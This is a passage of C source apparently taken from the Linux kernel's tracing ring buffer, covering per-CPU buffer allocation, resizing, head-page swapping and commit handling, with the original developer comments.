free_buffer_page(bpage);
}
return -ENOMEM;
}
static int rb_allocate_pages(struct ring_buffer_per_cpu *cpu_buffer,
unsigned long nr_pages)
{
LIST_HEAD(pages);
WARN_ON(!nr_pages);
if (__rb_allocate_pages(nr_pages, &pages, cpu_buffer->cpu))
return -ENOMEM;
/*
* The ring buffer page list is a circular list that does not
* start and end with a list head. All page list items point to
* other pages.
*/
cpu_buffer->pages = pages.next;
list_del(&pages);
cpu_buffer->nr_pages = nr_pages;
rb_check_pages(cpu_buffer);
return 0;
}
static struct ring_buffer_per_cpu *
rb_allocate_cpu_buffer(struct ring_buffer *buffer, long nr_pages, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct buffer_page *bpage;
struct page *page;
int ret;
cpu_buffer = kzalloc_node(ALIGN(sizeof(*cpu_buffer), cache_line_size()),
GFP_KERNEL, cpu_to_node(cpu));
if (!cpu_buffer)
return NULL;
cpu_buffer->cpu = cpu;
cpu_buffer->buffer = buffer;
raw_spin_lock_init(&cpu_buffer->reader_lock);
lockdep_set_class(&cpu_buffer->reader_lock, buffer->reader_lock_key);
cpu_buffer->lock = (arch_spinlock_t)__ARCH_SPIN_LOCK_UNLOCKED;
INIT_WORK(&cpu_buffer->update_pages_work, update_pages_handler);
init_completion(&cpu_buffer->update_done);
init_irq_work(&cpu_buffer->irq_work.work, rb_wake_up_waiters);
init_waitqueue_head(&cpu_buffer->irq_work.waiters);
init_waitqueue_head(&cpu_buffer->irq_work.full_waiters);
bpage = kzalloc_node(ALIGN(sizeof(*bpage), cache_line_size()),
GFP_KERNEL, cpu_to_node(cpu));
if (!bpage)
goto fail_free_buffer;
rb_check_bpage(cpu_buffer, bpage);
cpu_buffer->reader_page = bpage;
page = alloc_pages_node(cpu_to_node(cpu), GFP_KERNEL, 0);
if (!page)
goto fail_free_reader;
bpage->page = page_address(page);
rb_init_page(bpage->page);
INIT_LIST_HEAD(&cpu_buffer->reader_page->list);
INIT_LIST_HEAD(&cpu_buffer->new_pages);
ret = rb_allocate_pages(cpu_buffer, nr_pages);
if (ret < 0)
goto fail_free_reader;
cpu_buffer->head_page
= list_entry(cpu_buffer->pages, struct buffer_page, list);
cpu_buffer->tail_page = cpu_buffer->commit_page = cpu_buffer->head_page;
rb_head_page_activate(cpu_buffer);
return cpu_buffer;
fail_free_reader:
free_buffer_page(cpu_buffer->reader_page);
fail_free_buffer:
kfree(cpu_buffer);
return NULL;
}
static void rb_free_cpu_buffer(struct ring_buffer_per_cpu *cpu_buffer)
{
struct list_head *head = cpu_buffer->pages;
struct buffer_page *bpage, *tmp;
free_buffer_page(cpu_buffer->reader_page);
rb_head_page_deactivate(cpu_buffer);
if (head) {
list_for_each_entry_safe(bpage, tmp, head, list) {
list_del_init(&bpage->list);
free_buffer_page(bpage);
}
bpage = list_entry(head, struct buffer_page, list);
free_buffer_page(bpage);
}
kfree(cpu_buffer);
}
#ifdef CONFIG_HOTPLUG_CPU
static int rb_cpu_notify(struct notifier_block *self,
unsigned long action, void *hcpu);
#endif
/**
* __ring_buffer_alloc - allocate a new ring_buffer
* @size: the size in bytes per cpu that is needed.
* @flags: attributes to set for the ring buffer.
*
* Currently the only flag that is available is the RB_FL_OVERWRITE
* flag. This flag means that the buffer will overwrite old data
* when the buffer wraps. If this flag is not set, the buffer will
* drop data when the tail hits the head.
*/
struct ring_buffer *__ring_buffer_alloc(unsigned long size, unsigned flags,
struct lock_class_key *key)
{
struct ring_buffer *buffer;
long nr_pages;
int bsize;
int cpu;
/* keep it in its own cache line */
buffer = kzalloc(ALIGN(sizeof(*buffer), cache_line_size()),
GFP_KERNEL);
if (!buffer)
return NULL;
if (!alloc_cpumask_var(&buffer->cpumask, GFP_KERNEL))
goto fail_free_buffer;
nr_pages = DIV_ROUND_UP(size, BUF_PAGE_SIZE);
buffer->flags = flags;
buffer->clock = trace_clock_local;
buffer->reader_lock_key = key;
init_irq_work(&buffer->irq_work.work, rb_wake_up_waiters);
init_waitqueue_head(&buffer->irq_work.waiters);
/* need at least two pages */
if (nr_pages < 2)
nr_pages = 2;
/*
* In case of non-hotplug cpu, if the ring-buffer is allocated
* in early initcall, it will not be notified of secondary cpus.
* In that off case, we need to allocate for all possible cpus.
*/
#ifdef CONFIG_HOTPLUG_CPU
cpu_notifier_register_begin();
cpumask_copy(buffer->cpumask, cpu_online_mask);
#else
cpumask_copy(buffer->cpumask, cpu_possible_mask);
#endif
buffer->cpus = nr_cpu_ids;
bsize = sizeof(void *) * nr_cpu_ids;
buffer->buffers = kzalloc(ALIGN(bsize, cache_line_size()),
GFP_KERNEL);
if (!buffer->buffers)
goto fail_free_cpumask;
for_each_buffer_cpu(buffer, cpu) {
buffer->buffers[cpu] =
rb_allocate_cpu_buffer(buffer, nr_pages, cpu);
if (!buffer->buffers[cpu])
goto fail_free_buffers;
}
#ifdef CONFIG_HOTPLUG_CPU
buffer->cpu_notify.notifier_call = rb_cpu_notify;
buffer->cpu_notify.priority = 0;
__register_cpu_notifier(&buffer->cpu_notify);
cpu_notifier_register_done();
#endif
mutex_init(&buffer->mutex);
return buffer;
fail_free_buffers:
for_each_buffer_cpu(buffer, cpu) {
if (buffer->buffers[cpu])
rb_free_cpu_buffer(buffer->buffers[cpu]);
}
kfree(buffer->buffers);
fail_free_cpumask:
free_cpumask_var(buffer->cpumask);
#ifdef CONFIG_HOTPLUG_CPU
cpu_notifier_register_done();
#endif
fail_free_buffer:
kfree(buffer);
return NULL;
}
EXPORT_SYMBOL_GPL(__ring_buffer_alloc);
/**
* ring_buffer_free - free a ring buffer.
* @buffer: the buffer to free.
*/
void
ring_buffer_free(struct ring_buffer *buffer)
{
int cpu;
#ifdef CONFIG_HOTPLUG_CPU
cpu_notifier_register_begin();
__unregister_cpu_notifier(&buffer->cpu_notify);
#endif
for_each_buffer_cpu(buffer, cpu)
rb_free_cpu_buffer(buffer->buffers[cpu]);
#ifdef CONFIG_HOTPLUG_CPU
cpu_notifier_register_done();
#endif
kfree(buffer->buffers);
free_cpumask_var(buffer->cpumask);
kfree(buffer);
}
EXPORT_SYMBOL_GPL(ring_buffer_free);
void ring_buffer_set_clock(struct ring_buffer *buffer,
u64 (*clock)(void))
{
buffer->clock = clock;
}
static void rb_reset_cpu(struct ring_buffer_per_cpu *cpu_buffer);
static inline unsigned long rb_page_entries(struct buffer_page *bpage)
{
return local_read(&bpage->entries) & RB_WRITE_MASK;
}
static inline unsigned long rb_page_write(struct buffer_page *bpage)
{
return local_read(&bpage->write) & RB_WRITE_MASK;
}
static int
rb_remove_pages(struct ring_buffer_per_cpu *cpu_buffer, unsigned long nr_pages)
{
struct list_head *tail_page, *to_remove, *next_page;
struct buffer_page *to_remove_page, *tmp_iter_page;
struct buffer_page *last_page, *first_page;
unsigned long nr_removed;
unsigned long head_bit;
int page_entries;
head_bit = 0;
raw_spin_lock_irq(&cpu_buffer->reader_lock);
atomic_inc(&cpu_buffer->record_disabled);
/*
* We don't race with the readers since we have acquired the reader
* lock. We also don't race with writers after disabling recording.
* This makes it easy to figure out the first and the last page to be
* removed from the list. We unlink all the pages in between including
* the first and last pages. This is done in a busy loop so that we
* lose the least number of traces.
* The pages are freed after we restart recording and unlock readers.
*/
tail_page = &cpu_buffer->tail_page->list;
/*
* tail page might be on reader page, we remove the next page
* from the ring buffer
*/
if (cpu_buffer->tail_page == cpu_buffer->reader_page)
tail_page = rb_list_head(tail_page->next);
to_remove = tail_page;
/* start of pages to remove */
first_page = list_entry(rb_list_head(to_remove->next),
struct buffer_page, list);
for (nr_removed = 0; nr_removed < nr_pages; nr_removed++) {
to_remove = rb_list_head(to_remove)->next;
head_bit |= (unsigned long)to_remove & RB_PAGE_HEAD;
}
next_page = rb_list_head(to_remove)->next;
/*
* Now we remove all pages between tail_page and next_page.
* Make sure that we have head_bit value preserved for the
* next page
*/
tail_page->next = (struct list_head *)((unsigned long)next_page |
head_bit);
next_page = rb_list_head(next_page);
next_page->prev = tail_page;
/* make sure pages points to a valid page in the ring buffer */
cpu_buffer->pages = next_page;
/* update head page */
if (head_bit)
cpu_buffer->head_page = list_entry(next_page,
struct buffer_page, list);
/*
* change read pointer to make sure any read iterators reset
* themselves
*/
cpu_buffer->read = 0;
/* pages are removed, resume tracing and then free the pages */
atomic_dec(&cpu_buffer->record_disabled);
raw_spin_unlock_irq(&cpu_buffer->reader_lock);
RB_WARN_ON(cpu_buffer, list_empty(cpu_buffer->pages));
/* last buffer page to remove */
last_page = list_entry(rb_list_head(to_remove), struct buffer_page,
list);
tmp_iter_page = first_page;
do {
to_remove_page = tmp_iter_page;
rb_inc_page(cpu_buffer, &tmp_iter_page);
/* update the counters */
page_entries = rb_page_entries(to_remove_page);
if (page_entries) {
/*
* If something was added to this page, it was full
* since it is not the tail page. So we deduct the
* bytes consumed in ring buffer from here.
* Increment overrun to account for the lost events.
*/
local_add(page_entries, &cpu_buffer->overrun);
local_sub(BUF_PAGE_SIZE, &cpu_buffer->entries_bytes);
}
/*
* We have already removed references to this list item, just
* free up the buffer_page and its page
*/
free_buffer_page(to_remove_page);
nr_removed--;
} while (to_remove_page != last_page);
RB_WARN_ON(cpu_buffer, nr_removed);
return nr_removed == 0;
}
static int
rb_insert_pages(struct ring_buffer_per_cpu *cpu_buffer)
{
struct list_head *pages = &cpu_buffer->new_pages;
int retries, success;
raw_spin_lock_irq(&cpu_buffer->reader_lock);
/*
* We are holding the reader lock, so the reader page won't be swapped
* in the ring buffer. Now we are racing with the writer trying to
* move head page and the tail page.
* We are going to adapt the reader page update process where:
* 1. We first splice the start and end of list of new pages between
* the head page and its previous page.
* 2. We cmpxchg the prev_page->next to point from head page to the
* start of new pages list.
* 3. Finally, we update the head->prev to the end of new list.
*
* We will try this process 10 times, to make sure that we don't keep
* spinning.
*/
retries = 10;
success = 0;
while (retries--) {
struct list_head *head_page, *prev_page, *r;
struct list_head *last_page, *first_page;
struct list_head *head_page_with_bit;
head_page = &rb_set_head_page(cpu_buffer)->list;
if (!head_page)
break;
prev_page = head_page->prev;
first_page = pages->next;
last_page = pages->prev;
head_page_with_bit = (struct list_head *)
((unsigned long)head_page | RB_PAGE_HEAD);
last_page->next = head_page_with_bit;
first_page->prev = prev_page;
r = cmpxchg(&prev_page->next, head_page_with_bit, first_page);
if (r == head_page_with_bit) {
/*
* yay, we replaced the page pointer to our new list,
* now, we just have to update to head page's prev
* pointer to point to end of list
*/
head_page->prev = last_page;
success = 1;
break;
}
}
if (success)
INIT_LIST_HEAD(pages);
/*
* If we weren't successful in adding in new pages, warn and stop
* tracing
*/
RB_WARN_ON(cpu_buffer, !success);
raw_spin_unlock_irq(&cpu_buffer->reader_lock);
/* free pages if they weren't inserted */
if (!success) {
struct buffer_page *bpage, *tmp;
list_for_each_entry_safe(bpage, tmp, &cpu_buffer->new_pages,
list) {
list_del_init(&bpage->list);
free_buffer_page(bpage);
}
}
return success;
}
static void rb_update_pages(struct ring_buffer_per_cpu *cpu_buffer)
{
int success;
if (cpu_buffer->nr_pages_to_update > 0)
success = rb_insert_pages(cpu_buffer);
else
success = rb_remove_pages(cpu_buffer,
-cpu_buffer->nr_pages_to_update);
if (success)
cpu_buffer->nr_pages += cpu_buffer->nr_pages_to_update;
}
static void update_pages_handler(struct work_struct *work)
{
struct ring_buffer_per_cpu *cpu_buffer = container_of(work,
struct ring_buffer_per_cpu, update_pages_work);
rb_update_pages(cpu_buffer);
complete(&cpu_buffer->update_done);
}
/**
* ring_buffer_resize - resize the ring buffer
* @buffer: the buffer to resize.
* @size: the new size.
* @cpu_id: the cpu buffer to resize
*
* Minimum size is 2 * BUF_PAGE_SIZE.
*
* Returns 0 on success and < 0 on failure.
*/
int ring_buffer_resize(struct ring_buffer *buffer, unsigned long size,
int cpu_id)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long nr_pages;
int cpu, err = 0;
/*
* Always succeed at resizing a non-existent buffer:
*/
if (!buffer)
return size;
/* Make sure the requested buffer exists */
if (cpu_id != RING_BUFFER_ALL_CPUS &&
!cpumask_test_cpu(cpu_id, buffer->cpumask))
return size;
size = DIV_ROUND_UP(size, BUF_PAGE_SIZE);
size *= BUF_PAGE_SIZE;
/* we need a minimum of two pages */
if (size < BUF_PAGE_SIZE * 2)
size = BUF_PAGE_SIZE * 2;
nr_pages = DIV_ROUND_UP(size, BUF_PAGE_SIZE);
/*
* Don't succeed if resizing is disabled, as a reader might be
* manipulating the ring buffer and is expecting a sane state while
* this is true.
*/
if (atomic_read(&buffer->resize_disabled))
return -EBUSY;
/* prevent another thread from changing buffer sizes */
mutex_lock(&buffer->mutex);
if (cpu_id == RING_BUFFER_ALL_CPUS) {
/* calculate the pages to update */
for_each_buffer_cpu(buffer, cpu) {
cpu_buffer = buffer->buffers[cpu];
cpu_buffer->nr_pages_to_update = nr_pages -
cpu_buffer->nr_pages;
/*
* nothing more to do for removing pages or no update
*/
if (cpu_buffer->nr_pages_to_update <= 0)
continue;
/*
* to add pages, make sure all new pages can be
* allocated without receiving ENOMEM
*/
INIT_LIST_HEAD(&cpu_buffer->new_pages);
if (__rb_allocate_pages(cpu_buffer->nr_pages_to_update,
&cpu_buffer->new_pages, cpu)) {
/* not enough memory for new pages */
err = -ENOMEM;
goto out_err;
}
}
get_online_cpus();
/*
* Fire off all the required work handlers
* We can't schedule on offline CPUs, but it's not necessary
* since we can change their buffer sizes without any race.
*/
for_each_buffer_cpu(buffer, cpu) {
cpu_buffer = buffer->buffers[cpu];
if (!cpu_buffer->nr_pages_to_update)
continue;
/* Can't run something on an offline CPU. */
if (!cpu_online(cpu)) {
rb_update_pages(cpu_buffer);
cpu_buffer->nr_pages_to_update = 0;
} else {
schedule_work_on(cpu,
&cpu_buffer->update_pages_work);
}
}
/* wait for all the updates to complete */
for_each_buffer_cpu(buffer, cpu) {
cpu_buffer = buffer->buffers[cpu];
if (!cpu_buffer->nr_pages_to_update)
continue;
if (cpu_online(cpu))
wait_for_completion(&cpu_buffer->update_done);
cpu_buffer->nr_pages_to_update = 0;
}
put_online_cpus();
} else {
/* Make sure this CPU has been intitialized */
if (!cpumask_test_cpu(cpu_id, buffer->cpumask))
goto out;
cpu_buffer = buffer->buffers[cpu_id];
if (nr_pages == cpu_buffer->nr_pages)
goto out;
cpu_buffer->nr_pages_to_update = nr_pages -
cpu_buffer->nr_pages;
INIT_LIST_HEAD(&cpu_buffer->new_pages);
if (cpu_buffer->nr_pages_to_update > 0 &&
__rb_allocate_pages(cpu_buffer->nr_pages_to_update,
&cpu_buffer->new_pages, cpu_id)) {
err = -ENOMEM;
goto out_err;
}
get_online_cpus();
/* Can't run something on an offline CPU. */
if (!cpu_online(cpu_id))
rb_update_pages(cpu_buffer);
else {
schedule_work_on(cpu_id,
&cpu_buffer->update_pages_work);
wait_for_completion(&cpu_buffer->update_done);
}
cpu_buffer->nr_pages_to_update = 0;
put_online_cpus();
}
out:
/*
* The ring buffer resize can happen with the ring buffer
* enabled, so that the update disturbs the tracing as little
* as possible. But if the buffer is disabled, we do not need
* to worry about that, and we can take the time to verify
* that the buffer is not corrupt.
*/
if (atomic_read(&buffer->record_disabled)) {
atomic_inc(&buffer->record_disabled);
/*
* Even though the buffer was disabled, we must make sure
* that it is truly disabled before calling rb_check_pages.
* There could have been a race between checking
* record_disable and incrementing it.
*/
synchronize_sched();
for_each_buffer_cpu(buffer, cpu) {
cpu_buffer = buffer->buffers[cpu];
rb_check_pages(cpu_buffer);
}
atomic_dec(&buffer->record_disabled);
}
mutex_unlock(&buffer->mutex);
return size;
out_err:
for_each_buffer_cpu(buffer, cpu) {
struct buffer_page *bpage, *tmp;
cpu_buffer = buffer->buffers[cpu];
cpu_buffer->nr_pages_to_update = 0;
if (list_empty(&cpu_buffer->new_pages))
continue;
list_for_each_entry_safe(bpage, tmp, &cpu_buffer->new_pages,
list) {
list_del_init(&bpage->list);
free_buffer_page(bpage);
}
}
mutex_unlock(&buffer->mutex);
return err;
}
EXPORT_SYMBOL_GPL(ring_buffer_resize);
void ring_buffer_change_overwrite(struct ring_buffer *buffer, int val)
{
mutex_lock(&buffer->mutex);
if (val)
buffer->flags |= RB_FL_OVERWRITE;
else
buffer->flags &= ~RB_FL_OVERWRITE;
mutex_unlock(&buffer->mutex);
}
EXPORT_SYMBOL_GPL(ring_buffer_change_overwrite);
static inline void *
__rb_data_page_index(struct buffer_data_page *bpage, unsigned index)
{
return bpage->data + index;
}
static inline void *__rb_page_index(struct buffer_page *bpage, unsigned index)
{
return bpage->page->data + index;
}
static inline struct ring_buffer_event *
rb_reader_event(struct ring_buffer_per_cpu *cpu_buffer)
{
return __rb_page_index(cpu_buffer->reader_page,
cpu_buffer->reader_page->read);
}
static inline struct ring_buffer_event *
rb_iter_head_event(struct ring_buffer_iter *iter)
{
return __rb_page_index(iter->head_page, iter->head);
}
static inline unsigned rb_page_commit(struct buffer_page *bpage)
{
return local_read(&bpage->page->commit);
}
/* Size is determined by what has been committed */
static inline unsigned rb_page_size(struct buffer_page *bpage)
{
return rb_page_commit(bpage);
}
static inline unsigned
rb_commit_index(struct ring_buffer_per_cpu *cpu_buffer)
{
return rb_page_commit(cpu_buffer->commit_page);
}
static inline unsigned
rb_event_index(struct ring_buffer_event *event)
{
unsigned long addr = (unsigned long)event;
return (addr & ~PAGE_MASK) - BUF_PAGE_HDR_SIZE;
}
static void rb_inc_iter(struct ring_buffer_iter *iter)
{
struct ring_buffer_per_cpu *cpu_buffer = iter->cpu_buffer;
/*
* The iterator could be on the reader page (it starts there).
* But the head could have moved, since the reader was
* found. Check for this case and assign the iterator
* to the head page instead of next.
*/
if (iter->head_page == cpu_buffer->reader_page)
iter->head_page = rb_set_head_page(cpu_buffer);
else
rb_inc_page(cpu_buffer, &iter->head_page);
iter->read_stamp = iter->head_page->page->time_stamp;
iter->head = 0;
}
/*
* rb_handle_head_page - writer hit the head page
*
* Returns: +1 to retry page
* 0 to continue
* -1 on error
*/
static int
rb_handle_head_page(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page *tail_page,
struct buffer_page *next_page)
{
struct buffer_page *new_head;
int entries;
int type;
int ret;
entries = rb_page_entries(next_page);
/*
* The hard part is here. We need to move the head
* forward, and protect against both readers on
* other CPUs and writers coming in via interrupts.
*/
type = rb_head_page_set_update(cpu_buffer, next_page, tail_page,
RB_PAGE_HEAD);
/*
* type can be one of four:
* NORMAL - an interrupt already moved it for us
* HEAD - we are the first to get here.
* UPDATE - we are the interrupt interrupting
* a current move.
* MOVED - a reader on another CPU moved the next
* pointer to its reader page. Give up
* and try again.
*/
switch (type) {
case RB_PAGE_HEAD:
/*
* We changed the head to UPDATE, thus
* it is our responsibility to update
* the counters.
*/
local_add(entries, &cpu_buffer->overrun);
local_sub(BUF_PAGE_SIZE, &cpu_buffer->entries_bytes);
/*
* The entries will be zeroed out when we move the
* tail page.
*/
/* still more to do */
break;
case RB_PAGE_UPDATE:
/*
* This is an interrupt that interrupt the
* previous update. Still more to do.
*/
break;
case RB_PAGE_NORMAL:
/*
* An interrupt came in before the update
* and processed this for us.
* Nothing left to do.
*/
return 1;
case RB_PAGE_MOVED:
/*
* The reader is on another CPU and just did
* a swap with our next_page.
* Try again.
*/
return 1;
default:
RB_WARN_ON(cpu_buffer, 1); /* WTF??? */
return -1;
}
/*
* Now that we are here, the old head pointer is
* set to UPDATE. This will keep the reader from
* swapping the head page with the reader page.
* The reader (on another CPU) will spin till
* we are finished.
*
* We just need to protect against interrupts
* doing the job. We will set the next pointer
* to HEAD. After that, we set the old pointer
* to NORMAL, but only if it was HEAD before.
* otherwise we are an interrupt, and only
* want the outer most commit to reset it.
*/
new_head = next_page;
rb_inc_page(cpu_buffer, &new_head);
ret = rb_head_page_set_head(cpu_buffer, new_head, next_page,
RB_PAGE_NORMAL);
/*
* Valid returns are:
* HEAD - an interrupt came in and already set it.
* NORMAL - One of two things:
* 1) We really set it.
* 2) A bunch of interrupts came in and moved
* the page forward again.
*/
switch (ret) {
case RB_PAGE_HEAD:
case RB_PAGE_NORMAL:
/* OK */
break;
default:
RB_WARN_ON(cpu_buffer, 1);
return -1;
}
/*
* It is possible that an interrupt came in,
* set the head up, then more interrupts came in
* and moved it again. When we get back here,
* the page would have been set to NORMAL but we
* just set it back to HEAD.
*
* How do you detect this? Well, if that happened
* the tail page would have moved.
*/
if (ret == RB_PAGE_NORMAL) {
struct buffer_page *buffer_tail_page;
buffer_tail_page = READ_ONCE(cpu_buffer->tail_page);
/*
* If the tail had moved passed next, then we need
* to reset the pointer.
*/
if (buffer_tail_page != tail_page &&
buffer_tail_page != next_page)
rb_head_page_set_normal(cpu_buffer, new_head,
next_page,
RB_PAGE_HEAD);
}
/*
* If this was the outer most commit (the one that
* changed the original pointer from HEAD to UPDATE),
* then it is up to us to reset it to NORMAL.
*/
if (type == RB_PAGE_HEAD) {
ret = rb_head_page_set_normal(cpu_buffer, next_page,
tail_page,
RB_PAGE_UPDATE);
if (RB_WARN_ON(cpu_buffer,
ret != RB_PAGE_UPDATE))
return -1;
}
return 0;
}
static inline void
rb_reset_tail(struct ring_buffer_per_cpu *cpu_buffer,
unsigned long tail, struct rb_event_info *info)
{
struct buffer_page *tail_page = info->tail_page;
struct ring_buffer_event *event;
unsigned long length = info->length;
/*
* Only the event that crossed the page boundary
* must fill the old tail_page with padding.
*/
if (tail >= BUF_PAGE_SIZE) {
/*
* If the page was filled, then we still need
* to update the real_end. Reset it to zero
* and the reader will ignore it.
*/
if (tail == BUF_PAGE_SIZE)
tail_page->real_end = 0;
local_sub(length, &tail_page->write);
return;
}
event = __rb_page_index(tail_page, tail);
kmemcheck_annotate_bitfield(event, bitfield);
/* account for padding bytes */
local_add(BUF_PAGE_SIZE - tail, &cpu_buffer->entries_bytes);
/*
* Save the original length to the meta data.
* This will be used by the reader to add lost event
* counter.
*/
tail_page->real_end = tail;
/*
* If this event is bigger than the minimum size, then
* we need to be careful that we don't subtract the
* write counter enough to allow another writer to slip
* in on this page.
* We put in a discarded commit instead, to make sure
* that this space is not used again.
*
* If we are less than the minimum size, we don't need to
* worry about it.
*/
if (tail > (BUF_PAGE_SIZE - RB_EVNT_MIN_SIZE)) {
/* No room for any events */
/* Mark the rest of the page with padding */
rb_event_set_padding(event);
/* Set the write back to the previous setting */
local_sub(length, &tail_page->write);
return;
}
/* Put in a discarded event */
event->array[0] = (BUF_PAGE_SIZE - tail) - RB_EVNT_HDR_SIZE;
event->type_len = RINGBUF_TYPE_PADDING;
/* time delta must be non zero */
event->time_delta = 1;
/* Set write to end of buffer */
length = (tail + length) - BUF_PAGE_SIZE;
local_sub(length, &tail_page->write);
}
static inline void rb_end_commit(struct ring_buffer_per_cpu *cpu_buffer);
/*
* This is the slow path, force gcc not to inline it.
*/
static noinline struct ring_buffer_event *
rb_move_tail(struct ring_buffer_per_cpu *cpu_buffer,
unsigned long tail, struct rb_event_info *info)
{
struct buffer_page *tail_page = info->tail_page;
struct buffer_page *commit_page = cpu_buffer->commit_page;
struct ring_buffer *buffer = cpu_buffer->buffer;
struct buffer_page *next_page;
int ret;
next_page = tail_page;
rb_inc_page(cpu_buffer, &next_page);
/*
* If for some reason, we had an interrupt storm that made
* it all the way around the buffer, bail, and warn
* about it.
*/
if (unlikely(next_page == commit_page)) {
local_inc(&cpu_buffer->commit_overrun);
goto out_reset;
}
/*
* This is where the fun begins!
*
* We are fighting against races between a reader that
* could be on another CPU trying to swap its reader
* page with the buffer head.
*
* We are also fighting against interrupts coming in and
* moving the head or tail on us as well.
*
* If the next page is the head page then we have filled
* the buffer, unless the commit page is still on the
* reader page.
*/
if (rb_is_head_page(cpu_buffer, next_page, &tail_page->list)) {
/*
* If the commit is not on the reader page, then
* move the header page.
*/
if (!rb_is_reader_page(cpu_buffer->commit_page)) {
/*
* If we are not in overwrite mode,
* this is easy, just stop here.
*/
if (!(buffer->flags & RB_FL_OVERWRITE)) {
local_inc(&cpu_buffer->dropped_events);
goto out_reset;
}
ret = rb_handle_head_page(cpu_buffer,
tail_page,
next_page);
if (ret < 0)
goto out_reset;
if (ret)
goto out_again;
} else {
/*
* We need to be careful here too. The
* commit page could still be on the reader
* page. We could have a small buffer, and
* have filled up the buffer with events
* from interrupts and such, and wrapped.
*
* Note, if the tail page is also the on the
* reader_page, we let it move out.
*/
if (unlikely((cpu_buffer->commit_page !=
cpu_buffer->tail_page) &&
(cpu_buffer->commit_page ==
cpu_buffer->reader_page))) {
local_inc(&cpu_buffer->commit_overrun);
goto out_reset;
}
}
}
rb_tail_page_update(cpu_buffer, tail_page, next_page);
out_again:
rb_reset_tail(cpu_buffer, tail, info);
/* Commit what we have for now. */
rb_end_commit(cpu_buffer);
/* rb_end_commit() decs committing */
local_inc(&cpu_buffer->committing);
/* fail and let the caller try again */
return ERR_PTR(-EAGAIN);
out_reset:
/* reset write */
rb_reset_tail(cpu_buffer, tail, info);
return NULL;
}
/* Slow path, do not inline */
static noinline struct ring_buffer_event *
rb_add_time_stamp(struct ring_buffer_event *event, u64 delta)
{
event->type_len = RINGBUF_TYPE_TIME_EXTEND;
/* Not the first event on the page? */
if (rb_event_index(event)) {
event->time_delta = delta & TS_MASK;
event->array[0] = delta >> TS_SHIFT;
} else {
/* nope, just zero it */
event->time_delta = 0;
event->array[0] = 0;
}
return skip_time_extend(event);
}
static inline bool rb_event_is_commit(struct ring_buffer_per_cpu *cpu_buffer,
struct ring_buffer_event *event);
/**
* rb_update_event - update event type and data
* @event: the event to update
* @type: the type of event
* @length: the size of the event field in the ring buffer
*
* Update the type and data fields of the event. The length
* is the actual size that is written to the ring buffer,
* and with this, we can determine what to place into the
* data field.
*/
static void
rb_update_event(struct ring_buffer_per_cpu *cpu_buffer,
struct ring_buffer_event *event,
struct rb_event_info *info)
{
unsigned length = info->length;
u64 delta = info->delta;
/* Only a commit updates the timestamp */
if (unlikely(!rb_event_is_commit(cpu_buffer, event)))
delta = 0;
/*
* If we need to add a timestamp, then we
* add it to the start of the resevered space.
*/
if (unlikely(info->add_timestamp)) {
event = rb_add_time_stamp(event, delta);
length -= RB_LEN_TIME_EXTEND;
delta = 0;
}
event->time_delta = delta;
length -= RB_EVNT_HDR_SIZE;
if (length > RB_MAX_SMALL_DATA || RB_FORCE_8BYTE_ALIGNMENT) {
event->type_len = 0;
event->array[0] = length;
} else
event->type_len = DIV_ROUND_UP(length, RB_ALIGNMENT);
}
static unsigned rb_calculate_event_length(unsigned length)
{
struct ring_buffer_event event; /* Used only for sizeof array */
/* zero length can cause confusions */
if (!length)
length++;
if (length > RB_MAX_SMALL_DATA || RB_FORCE_8BYTE_ALIGNMENT)
length += sizeof(event.array[0]);
length += RB_EVNT_HDR_SIZE;
length = ALIGN(length, RB_ARCH_ALIGNMENT);
/*
* In case the time delta is larger than the 27 bits for it
* in the header, we need to add a timestamp. If another
* event comes in when trying to discard this one to increase
* the length, then the timestamp will be added in the allocated
* space of this event. If length is bigger than the size needed
* for the TIME_EXTEND, then padding has to be used. The events
* length must be either RB_LEN_TIME_EXTEND, or greater than or equal
* to RB_LEN_TIME_EXTEND + 8, as 8 is the minimum size for padding.
* As length is a multiple of 4, we only need to worry if it
* is 12 (RB_LEN_TIME_EXTEND + 4).
*/
if (length == RB_LEN_TIME_EXTEND + RB_ALIGNMENT)
length += RB_ALIGNMENT;
return length;
}
#ifndef CONFIG_HAVE_UNSTABLE_SCHED_CLOCK
static inline bool sched_clock_stable(void)
{
return true;
}
#endif
static inline int
rb_try_to_discard(struct ring_buffer_per_cpu *cpu_buffer,
struct ring_buffer_event *event)
{
unsigned long new_index, old_index;
struct buffer_page *bpage;
unsigned long index;
unsigned long addr;
new_index = rb_event_index(event);
old_index = new_index + rb_event_ts_length(event);
addr = (unsigned long)event;
addr &= PAGE_MASK;
bpage = READ_ONCE(cpu_buffer->tail_page);
if (bpage->page == (void *)addr && rb_page_write(bpage) == old_index) {
unsigned long write_mask =
local_read(&bpage->write) & ~RB_WRITE_MASK;
unsigned long event_length = rb_event_length(event);
/*
* This is on the tail page. It is possible that
* a write could come in and move the tail page
* and write to the next page. That is fine
* because we just shorten what is on this page.
*/
old_index += write_mask;
new_index += write_mask;
index = local_cmpxchg(&bpage->write, old_index, new_index);
if (index == old_index) {
/* update counters */
local_sub(event_length, &cpu_buffer->entries_bytes);
return 1;
}
}
/* could not discard */
return 0;
}
static void rb_start_commit(struct ring_buffer_per_cpu *cpu_buffer)
{
local_inc(&cpu_buffer->committing);
local_inc(&cpu_buffer->commits);
}
static void
rb_set_commit_to_write(struct ring_buffer_per_cpu *cpu_buffer)
{
unsigned long max_count;
/*
* We only race with interrupts and NMIs on this CPU.
* If we own the commit event, then we can commit
* all others that interrupted us, since the interruptions
* are in stack format (they finish before they come
* back to us). This allows us to do a simple loop to
* assign the commit to the tail.
*/
again:
max_count = cpu_buffer->nr_pages * 100;
while (cpu_buffer->commit_page != READ_ONCE(cpu_buffer->tail_page)) {
if (RB_WARN_ON(cpu_buffer, !(--max_count)))
return;
if (RB_WARN_ON(cpu_buffer,
rb_is_reader_page(cpu_buffer->tail_page)))
return;
local_set(&cpu_buffer->commit_page->page->commit,
rb_page_write(cpu_buffer->commit_page));
rb_inc_page(cpu_buffer, &cpu_buffer->commit_page);
/* Only update the write stamp if the page has an event */
if (rb_page_write(cpu_buffer->commit_page))
cpu_buffer->write_stamp =
cpu_buffer->commit_page->page->time_stamp;
/* add barrier to keep gcc from optimizing too much */
barrier();
}
while (rb_commit_index(cpu_buffer) !=
rb_page_write(cpu_buffer->commit_page)) {
local_set(&cpu_buffer->commit_page->page->commit,
rb_page_write(cpu_buffer->commit_page));
RB_WARN_ON(cpu_buffer,
local_read(&cpu_buffer->commit_page->page->commit) &
~RB_WRITE_MASK);
barrier();
}
